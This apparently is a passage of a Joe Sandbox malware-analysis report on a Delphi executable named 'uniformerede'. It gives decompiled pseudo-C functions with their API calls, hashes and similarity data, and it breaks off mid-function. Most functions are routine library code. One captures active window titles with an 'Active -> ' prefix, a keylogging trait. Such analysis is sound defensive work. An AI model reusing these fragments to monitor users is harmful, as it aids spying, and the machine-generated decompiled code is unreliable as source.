                                                                                                                                                                                                                            				_t71 = __edi;
                                                                                                                                                                                                                            				_t74 = _t75;
                                                                                                                                                                                                                            				_t76 = _t75 + 0xfffffff0;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t74);
                                                                                                                                                                                                                            				_push(0x45af60);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t76;
                                                                                                                                                                                                                            				_t56 = E0045ADD8(_v8);
                                                                                                                                                                                                                            				if( *((char*)(_v8 + 0x88)) != 0) {
                                                                                                                                                                                                                            					_t52 = _v8;
                                                                                                                                                                                                                            					_t79 =  *((intOrPtr*)(_t52 + 0x48));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
                                                                                                                                                                                                                            						E0045B3A8(_v8);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00458DF8(_t56,  &_v20);
                                                                                                                                                                                                                            				E004380E0(_v20, 0,  &_v16, _t79);
                                                                                                                                                                                                                            				_t36 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            				E0045B010(_t36, _v16, _t79);
                                                                                                                                                                                                                            				_v9 = 1;
                                                                                                                                                                                                                            				_push(_t74);
                                                                                                                                                                                                                            				_push(0x45af07);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t76;
                                                                                                                                                                                                                            				if( *((short*)(_v8 + 0x102)) != 0) {
                                                                                                                                                                                                                            					_t56 = _v8;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_v8 + 0x100))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v9 != 0) {
                                                                                                                                                                                                                            					E0045AD74();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t66);
                                                                                                                                                                                                                            				 *[fs:eax] = _t66;
                                                                                                                                                                                                                            				_t41 = GetCurrentThreadId();
                                                                                                                                                                                                                            				_t67 =  *0x49de40; // 0x49e034
                                                                                                                                                                                                                            				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
                                                                                                                                                                                                                            					_v9 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v9 != 0) {
                                                                                                                                                                                                                            					WaitMessage();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t68);
                                                                                                                                                                                                                            				 *[fs:eax] = _t68;
                                                                                                                                                                                                                            				_push(E0045AF67);
                                                                                                                                                                                                                            				return E004049E4( &_v20, 2);
                                                                                                                                                                                                                            			}


APIs
  • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
• GetCurrentThreadId.KERNEL32 ref: 0045AF1C
• WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
Strings
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID: CurrentCursorMessageThreadWait
• String ID: 4I
• API String ID: 535285469-2364942553
• Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
• Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
• Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
• Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0040B620(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				short _v18;
                                                                                                                                                                                                                            				short _v22;
                                                                                                                                                                                                                            				struct _SYSTEMTIME _v24;
                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                            				char* _t32;
                                                                                                                                                                                                                            				intOrPtr* _t49;
                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                            				_t63 = __eax;
                                                                                                                                                                                                                            				_push(_t67);
                                                                                                                                                                                                                            				_push(0x40b6fe);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t67 + 0xfffffeec;
                                                                                                                                                                                                                            				E004049C0(__edx);
                                                                                                                                                                                                                            				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                                                                                                                                                                                                                            				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                                                                                                                                                                                                                            				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                                                                                                                                                                                                                            				if(_t63 > 2) {
                                                                                                                                                                                                                            					E00404A58( &_v8, 0x40b720);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00404A58( &_v8, 0x40b714);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t32 = E00404E80(_v8);
                                                                                                                                                                                                                            				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                                                                                                                                                                                                            					E00404C30(_t49, 0x100,  &_v280);
                                                                                                                                                                                                                            					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                                                                                                                                                                                                            						E00404EE0( *_t49, E00404C80( *_t49) - 1, 2, _t49);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t58);
                                                                                                                                                                                                                            				 *[fs:eax] = _t58;
                                                                                                                                                                                                                            				_push(E0040B705);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}














APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6A6
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6AC
Strings
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
• Opcode ID: c40c53b5022c3b6d53ef6eb9169cbbe0f0549cacc423d75f4f5ec497cf9a52fc
• Instruction ID: 9bb3f367f0bbc217274b1ad28ba4a7515005ed0bbfdc0499212bfc9343ce28fe
• Opcode Fuzzy Hash: c40c53b5022c3b6d53ef6eb9169cbbe0f0549cacc423d75f4f5ec497cf9a52fc
• Instruction Fuzzy Hash: E42132B46041089BDB01EBA5C942AAE73A8EF48300F51447BF904F73D1D7789E04C7AE
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                                                                            			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _t62;
                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t77 = _t78;
                                                                                                                                                                                                                            				_t79 = _t78 + 0xfffffff8;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_v12 = E00403BBC(1);
                                                                                                                                                                                                                            				_push(_t77);
                                                                                                                                                                                                                            				_push(0x42a46f);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t79;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                                                                                                                                                                                                            				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                                                                                                                                                                                                            				_t80 = _t79 + 0xc;
                                                                                                                                                                                                                            				 *((char*)(_v12 + 0x70)) = _a8;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t62 =  *0x418ef8; // 0x418f44
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v12 + 0x6c)) = E00403D9C(_a4, _t62);
                                                                                                                                                                                                                            				_pop(_t64);
                                                                                                                                                                                                                            				 *[fs:eax] = _t64;
                                                                                                                                                                                                                            				_push(0x49e8b0);
                                                                                                                                                                                                                            				L00406FE0();
                                                                                                                                                                                                                            				_push(_t77);
                                                                                                                                                                                                                            				_push(0x42a4cf);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t80;
                                                                                                                                                                                                                            				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                                                                                                                                                                                                            				E00428E6C(_v12);
                                                                                                                                                                                                                            				_pop(_t67);
                                                                                                                                                                                                                            				 *[fs:eax] = _t67;
                                                                                                                                                                                                                            				_push(0x42a4d6);
                                                                                                                                                                                                                            				_push(0x49e8b0);
                                                                                                                                                                                                                            				L004071A0();
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                            • String ID: P>B
                                                                                                                                                                                                                            • API String ID: 3168844106-1256901731
                                                                                                                                                                                                                            • Opcode ID: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                                                                                                                                                                                            • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 529a9a366aa929e4620bea5d697823ec64bf912a646acf53574e1b983412bb67
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E004769AC(void* __ebx, void* __edx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                            				struct HWND__* _t48;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(_t67);
                                                                                                                                                                                                                            				_push(0x476a7b);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t67;
                                                                                                                                                                                                                            				_t48 =  *(__edx + 4);
                                                                                                                                                                                                                            				if(_t48 > 0) {
                                                                                                                                                                                                                            					E0040500C( &_v8, GetWindowTextLengthA(_t48));
                                                                                                                                                                                                                            					_t28 = E00404C80(_v8) + 1;
                                                                                                                                                                                                                            					GetWindowTextA(_t48, E00404E80(_v8), _t28);
                                                                                                                                                                                                                            					_t32 =  *0x49ec6c; // 0x0
                                                                                                                                                                                                                            					E00408FF8(_t32,  &_v12);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					E00408FF8(_v8,  &_v16);
                                                                                                                                                                                                                            					_pop(_t37);
                                                                                                                                                                                                                            					E00404DCC(_t37, _v16);
                                                                                                                                                                                                                            					if(_t28 != 0) {
                                                                                                                                                                                                                            						E00408FF8(_v8,  &_v20);
                                                                                                                                                                                                                            						if(_v20 != 0) {
                                                                                                                                                                                                                            							E00404A14(0x49ec6c, _v8);
                                                                                                                                                                                                                            							E00404CCC( &_v24, _v8, "Active -> ");
                                                                                                                                                                                                                            							_t45 =  *0x49ec44; // 0x0
                                                                                                                                                                                                                            							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t55);
                                                                                                                                                                                                                            				 *[fs:eax] = _t55;
                                                                                                                                                                                                                            				_push(0x476a82);
                                                                                                                                                                                                                            				return E004049E4( &_v24, 5);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                                                                                                                                                                                            • GetWindowTextA.USER32 ref: 004769F4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: TextWindow$Length
                                                                                                                                                                                                                            • String ID: Active ->
                                                                                                                                                                                                                            • API String ID: 1006428111-2811066380
                                                                                                                                                                                                                            • Opcode ID: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                                                                                                                                                                                            • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a34852fa71e462f670709aa45cdd9028366e921516bd4f16c1ddaa93e44f0273
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				struct HDC__* _t47;
                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_t36 = __eax;
                                                                                                                                                                                                                            				_push(_t50);
                                                                                                                                                                                                                            				_push(0x43b326);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t50 + 0xfffffff4;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
                                                                                                                                                                                                                            					_v12 =  *((intOrPtr*)(__eax + 8));
                                                                                                                                                                                                                            					_v8 = 0xb;
                                                                                                                                                                                                                            					_t31 =  *0x49dc4c; // 0x422f30
                                                                                                                                                                                                                            					E00406A70(_t31,  &_v16);
                                                                                                                                                                                                                            					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
                                                                                                                                                                                                                            				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
                                                                                                                                                                                                                            				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
                                                                                                                                                                                                                            				_pop(_t42);
                                                                                                                                                                                                                            				 *[fs:eax] = _t42;
                                                                                                                                                                                                                            				_push(0x43b32d);
                                                                                                                                                                                                                            				return E004049C0( &_v16);
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClipIntersectLoadRectStringViewport
                                                                                                                                                                                                                            • String ID: 0/B
                                                                                                                                                                                                                            • API String ID: 2734429277-1373906003
                                                                                                                                                                                                                            • Opcode ID: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                                                                                                                                                                                            • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2a8b772cc04bb5050f4f3461b5c500d9201bab241943ca1f0f2e8e1c857e399
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043B338(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				struct tagRECT _v21;
                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v5 = 1;
                                                                                                                                                                                                                            				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                                                                                                                                                                                                            				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                                                                                                                                                                                                            				if(_t45 <= 0) {
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					_v5 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						_t45 = _t45 - 1;
                                                                                                                                                                                                                            						_t40 = E0041AC6C(_t44, _t45);
                                                                                                                                                                                                                            						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E0043A91C(_t40,  &_v40);
                                                                                                                                                                                                                            							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                                                                                                                                                                                                            							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                            					} while (_t45 > 0);
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L6:
                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$EqualIntersect
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 3291753422-2766056989
                                                                                                                                                                                                                            • Opcode ID: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                                                                                                                                                                                            • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3dbe96d5647e64b59e77b546ad2791974d62cec345338b82838d99b1a4952e45
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                            			E0047DF40(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				CHAR* _t9;
                                                                                                                                                                                                                            				intOrPtr _t10;
                                                                                                                                                                                                                            				CHAR* _t21;
                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t28 = __edx;
                                                                                                                                                                                                                            				_t38 = __eax;
                                                                                                                                                                                                                            				_push(_t41);
                                                                                                                                                                                                                            				_push(0x47dfd7);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t41;
                                                                                                                                                                                                                            				E0040500C(__edx, 0x105);
                                                                                                                                                                                                                            				if(_t38 <= 0) {
                                                                                                                                                                                                                            					_t9 = E00404E80( *_t28);
                                                                                                                                                                                                                            					_t10 =  *0x49eea8; // 0x0
                                                                                                                                                                                                                            					GetTempFileNameA(E00404E80(_t10), "Indy", 0, _t9);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t21 = E00404E80( *_t28);
                                                                                                                                                                                                                            					E0047DBD4(_t38,  &_v8);
                                                                                                                                                                                                                            					GetTempFileNameA(E00404E80(_v8), "Indy", 0, _t21);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00404BB8(_t28, E00404E80( *_t28));
                                                                                                                                                                                                                            				_pop(_t35);
                                                                                                                                                                                                                            				 *[fs:eax] = _t35;
                                                                                                                                                                                                                            				_push(0x47dfde);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(00000000,Indy,00000000,00000000,00000000,0047DFD7,?,?,?,00000000), ref: 0047DF8B
                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(00000000,Indy,00000000,00000000,00000000,0047DFD7,?,?,?,00000000), ref: 0047DFAC
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileNameTemp
                                                                                                                                                                                                                            • String ID: Indy
                                                                                                                                                                                                                            • API String ID: 745986568-2908309946
                                                                                                                                                                                                                            • Opcode ID: 69e430025b6aa862baa62224b9fef3d972f906d16b369d55fcb03e5947137af5
                                                                                                                                                                                                                            • Instruction ID: 49c60834a58869adaa52c85b93ece72bdbff6cc483172d4f67a88a61853ae6a7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69e430025b6aa862baa62224b9fef3d972f906d16b369d55fcb03e5947137af5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC018470B142046BDB10F67ADC42B5A72ADEF84714F52447BF905EB281C67CAD04869D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E0042F680(void* __eax, void* __ebx, void* __ecx, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t23 = __eax;
                                                                                                                                                                                                                            				_push(_t35);
                                                                                                                                                                                                                            				_push(0x42f6ff);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t35;
